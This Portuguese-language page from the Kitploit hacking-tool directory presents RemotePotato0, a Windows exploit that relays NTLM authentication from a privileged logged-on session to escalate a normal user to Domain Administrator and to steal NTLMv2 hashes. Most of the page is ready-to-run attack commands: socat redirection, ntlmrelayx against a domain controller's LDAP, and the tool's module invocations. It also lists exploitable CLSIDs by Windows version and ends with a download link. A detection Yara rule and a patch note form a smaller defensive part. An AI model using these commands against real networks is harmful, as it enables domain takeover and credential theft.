Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
RemotePotato0 — Escalação de privilégios no Windows de usuário para administrador de domínio. | Kitploit
Ferramentas/GitHubGitHub/antoniococo/remotepotato0
Escalada de PrivilégiosExploraçãoMovimento LateralTestes de PenetraçãoAutenticação
GitHubantoniococo/remotepotato0

RemotePotato0

Escalação de privilégios no Windows de usuário para administrador de domínio.

Ver Repositório
1.5k2228há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

RemotePotato0

ATUALIZAÇÃO 21-10-2022: O principal cenário de exploit RPC->LDAP do RemotePotato0 foi corrigido. Mais detalhes em --> https://twitter.com/splinter_code/status/1583555613950255104

Apenas mais uma "Won't Fix" de Escalação de Privilégio no Windows de Usuário para Administrador de Domínio.

RemotePotato0 é um exploit que permite elevar seus privilégios de um Usuário genérico para Administrador de Domínio.

Resumidamente:

  • Ele abusa do serviço de ativação DCOM e dispara uma autenticação NTLM de qualquer usuário atualmente logado na máquina alvo.
  • É necessário que um usuário privilegiado esteja logado na mesma máquina (ex: um usuário Administrador de Domínio).
  • Uma vez que o NTLM tipo1 é disparado, configuramos um servidor de retransmissão de protocolo cruzado que recebe a mensagem tipo1 privilegiada e a retransmite para um terceiro recurso, desempacotando o protocolo RPC e empacotando a autenticação sobre HTTP. Na extremidade receptora, você pode configurar um nó de retransmissão adicional (ex: ntlmrelayx) ou retransmitir diretamente para um recurso privilegiado.
  • RemotePotato0 também permite capturar e roubar hashes NTLMv2 de todos os usuários logados em uma máquina.

Exemplos

Máquina atacante (10.0.0.20)

Máquina vítima (10.0.0.45)

Controlador de Domínio vítima (10.0.0.10)

Módulo 0 - Servidor de retransmissão de protocolo cruzado Rpc2Http + gatilho do potato

root@kitploit:~
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.45:9999 &
sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user

Nota: se você estiver no Windows Server <= 2016, pode evitar o redirecionador de rede (socat) porque a resolução oxid pode ser realizada localmente.

root@kitploit:~
query user
.\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1

Módulo 1 - Servidor de retransmissão de protocolo cruzado Rpc2Http

root@kitploit:~
.\RemotePotato0.exe -m 1 -l 9997 -r 10.0.0.20 
root@kitploit:~
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm

Módulo 2 - Servidor de captura RPC (hash) + gatilho do potato

root@kitploit:~
query user
.\RemotePotato0.exe -m 2 -s 1

Módulo 3 - Servidor de captura RPC (hash)

root@kitploit:~
.\RemotePotato0.exe -m 3 -l 9997
root@kitploit:~
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm

Uso

root@kitploit:~


        RemotePotato0
        @splinter_code & @decoder_it



Mandatory args:
-m module
        Allowed values:
        0 - Rpc2Http cross protocol relay server + potato trigger (default)
        1 - Rpc2Http cross protocol relay server
        2 - Rpc capture (hash) server + potato trigger
        3 - Rpc capture (hash) server


Other args: (someone could be mandatory and/or optional based on the module you use)
-r Remote HTTP relay server ip
-t Remote HTTP relay server port (Default 80)
-x Rogue Oxid Resolver ip (default 127.0.0.1)
-p Rogue Oxid Resolver port (default 9999)
-l RPC Relay server listening port (Default 9997)
-s Session id for the Cross Session Activation attack (default disabled)
-c CLSID (Default {5167B42F-C111-47A1-ACC4-8EABE61B0B54})

Demonstração

Ativação de sessão cruzada

Roubador de Hash

Lista de CLSID

Uma lista de CLSID utilizáveis em várias versões do Windows:

Windows Server 2019

root@kitploit:~
{0002DF02-0000-0000-C000-000000000046} - BrowserBroker Class   
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4} - AuthBrokerUI 
{5167B42F-C111-47A1-ACC4-8EABE61B0B54} - Easconsent.dll 
{924DC564-16A6-42EB-929A-9A61FA7DA06F} - Interface de Autenticação CredUI Auxiliar Fora de Processo para Clientes Não-AppContainer  
{934b410c-43e4-415e-9935-fbc081ba93a9} - UserInfoDialog   
{BA441419-0B3F-4FB6-A903-D16CC14CCA44} - CLSID_LockScreenContentionFlyout 
{c58ca859-80bc-48df-8f06-ffa94a405bff} - Picker Host   
{f65817c8-dd85-4136-89f0-b9d12939f2c4} - IsolatedMessageDialogFactory  
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} - Classe SPPUIObjectInteractive
{f8842f8e-dafe-4b37-9d38-4e0714a61149} - CastServerInteractiveUser

Windows Server 2016

root@kitploit:~
{924DC564-16A6-42EB-929A-9A61FA7DA06F}
{f65817c8-dd85-4136-89f0-b9d12939f2c4}
{BA441419-0B3F-4FB6-A903-D16CC14CCA44}
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4}
{934b410c-43e4-415e-9935-fbc081ba93a9}
{f8842f8e-dafe-4b37-9d38-4e0714a61149}
{0002DF02-0000-0000-C000-000000000046}
{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
{c58ca859-80bc-48df-8f06-ffa94a405bff}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

Windows Server 2008 R2

root@kitploit:~
{FCC74B77-EC3E-4dd8-A80B-008A702075A9}
{9BA05972-F6A8-11CF-A442-00A0C90A8F39}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

Você pode encontrar uma lista mais completa aqui --> http://ohpe.it/juicy-potato/CLSID/

Detecção

Regra Yara para detectar o binário RemotePotato0:

root@kitploit:~
rule SentinelOne_RemotePotato0_privesc {
    meta:
        author = "SentinelOne"
        description = "Detects RemotePotato0 binary"
        reference = "https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop"
        
    strings:
        $import1 = "CoGetInstanceFromIStorage"
        $istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii
        $meow_header = { 4d 45 4f 57 }
        $clsid1 = "{11111111-2222-3333-4444-555555555555}" nocase wide ascii
        $clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii
        
    condition:        
        (uint16(0) == 0x5A4D) and $import1 and $istorage_clsid and $meow_header and 1 of ($clsid*)
}

Autores

  • Antonio Cocomazzi
  • Andrea Pierini

Créditos

  • Impacket
  • @tiraniddo - Ativação de Sessão Cruzada
  • @Responder

Referências

  • https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop/
  • https://www.tiraniddo.dev/2021/04/standard-activating-yourself-to.html
Baixar ferramenta